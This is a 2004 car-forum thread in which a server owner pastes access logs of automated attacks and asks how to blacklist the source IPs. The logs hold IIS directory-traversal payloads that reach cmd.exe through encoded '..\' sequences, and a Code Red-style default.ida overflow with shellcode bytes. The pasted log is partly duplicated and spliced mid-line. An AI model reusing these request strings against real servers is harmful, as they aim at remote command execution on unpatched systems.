The Nissan Club banner

1 - 3 of 3 Posts

·
Registered
Joined
·
146 Posts
Discussion Starter #1
Well I guess this is a question, I was just looking through my error_log on my server & I came up with a buch of errors like these found below. is there an easy was to just auto blacklist these IP's once they do something stupid like below? FYI; this isn't a win box so these script kiddie attacks just take up log space.

64.246.165.160 - - [16/Aug/2004:02:27:31 +0000] "GET / HTTP/1.1" 206 1533
69.142.187.141 - - [16/Aug/2004:09:38:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 323
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 321
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir H64.246.165.160 - - [16/Aug/2004:02:27:31 +0000] "GET / HTTP/1.1" 206 1533
69.142.187.141 - - [16/Aug/2004:09:38:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 323
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 321
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 378
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 335
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 335
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.81.41.62 - - [16/Aug/2004:14:25:31 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 331
TTP/1.0" 404 378
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 335
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 335
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.81.41.62 - - [16/Aug/2004:14:25:31 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 331
 

·
Registered
Joined
·
288 Posts
if it's log space you're worried about, maybe try writing an awk script to filter out anything containing certain keywords (*.exe, *.ida, other exploits...) and then throw it in cron depending on how many exploit attempts you get hit with...
 
1 - 3 of 3 Posts
Top